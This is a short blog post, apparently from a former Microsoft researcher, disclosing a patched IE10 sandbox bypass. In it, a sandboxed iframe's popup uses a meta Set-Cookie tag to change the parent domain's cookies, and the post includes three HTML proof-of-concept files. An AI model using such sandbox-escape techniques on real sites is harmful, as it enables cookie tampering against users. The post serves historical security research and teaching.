IE10 Sandbox Bypass via Meta Set-Cookie

After playing around with the new IE10 sandbox flags for a while, I found that a sandboxed iFrame with only allow-popups could still set cookies on the parent domain using a <meta http-equiv="Set-Cookie"> tag. The sandbox correctly blocked scripts and XHR, but the HTTP-equiv meta tag took a different code path entirely.

<!-- index.html: sandboxes an iFrame with only allow-popups -->
<iframe sandbox="allow-popups" src="sandboxed.html" width="350" height="50"></iframe>
<script>
document.cookie = "COOKIE WAS SET BY THE NON-SANDBOXED WINDOW";
function checkCookieChanges() {
    if (document.cookie != "COOKIE WAS SET BY THE NON-SANDBOXED WINDOW") {
        alert(document.cookie);
    } else {
        setTimeout("checkCookieChanges();", 1000);
    }
}
checkCookieChanges();
</script>

<!-- sandboxed.html: opens a new sandboxed window -->
<a href="set-cookie.html" target="_blank">Open set-cookie.html in a Sandboxed Window</a>

<!-- set-cookie.html: sets the cookie from inside the sandbox -->
<meta http-equiv="Set-Cookie" content="COOKIE HAS BEEN CHANGED BY THE SANDBOXED WINDOW">

The sandboxed page opens a new popup (allowed by allow-popups) and that popup loads set-cookie.html, which sets a cookie using a meta tag rather than JavaScript. Because the meta tag processing happened outside the JavaScript sandbox enforcement, the cookie change was visible to the parent page. Tested on Win8 RP IE10.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10: createDocument Documents Load External Content via video, audio, bgsound, and HTC Behavior] :: [IE10 Sandbox Bypass via New Window Write-Back] >